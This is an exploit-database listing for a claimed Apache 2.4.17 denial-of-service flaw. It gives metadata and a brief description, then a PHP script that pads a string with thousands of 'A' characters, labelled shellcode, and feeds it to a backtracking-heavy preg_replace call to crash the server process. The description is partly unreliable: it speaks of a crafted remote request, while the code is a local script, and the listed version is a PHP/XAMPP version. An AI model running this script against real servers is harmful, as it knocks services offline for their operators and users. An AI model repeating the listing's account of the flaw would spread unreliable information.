Apache 2.4.17 - Denial of Service

vendor:

Apache 2.4.17

by:

Ahmed Atif

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: Apache 2.4.17

Affected Version From: 2.4.17

Affected Version To: 2.4.17

Patch Exists: YES

Related CWE: N/A

CPE: 2.4.17

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2015

Apache 2.4.17 – Denial of Service

A denial of service vulnerability exists in Apache 2.4.17 due to a preg_replace() function call that can be used to cause a segmentation fault. An attacker can exploit this vulnerability by sending a crafted request containing a specially crafted payload to the vulnerable server. This will cause the server to crash and become unavailable.

Mitigation:

Upgrade to Apache 2.4.18 or later.

Source

Exploit-DB raw data:

# Exploit Title: Apache 2.4.17 - Denial of Service
# Date: 17/12/2015
# Exploit Author: rUnVirus [ Ahmed Atif]
# Vendor Homepage: www.apache.org
# Software Link: https://www.apachefriends.org/download.html/
# Version: 5.5.30
# Tested on: windows 7 - XAMPP Version 5.5.30 (Apache 2.4.17 - PHP 5.5.30) 


<?php

$s="<?php

//!*runvirus:start*!";

$s2="!*runvirus:end*! ?>";


 
$shellcode= 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

";
 
$egg = $s.$shellcode.$s2;



$content = preg_replace(
  '%//!\*runvirus:start\*!(.)+!\*runvirus:end\*!%s',
  'test',
  $egg
);

echo 'If you can see this everything seems to be working fine.';

?>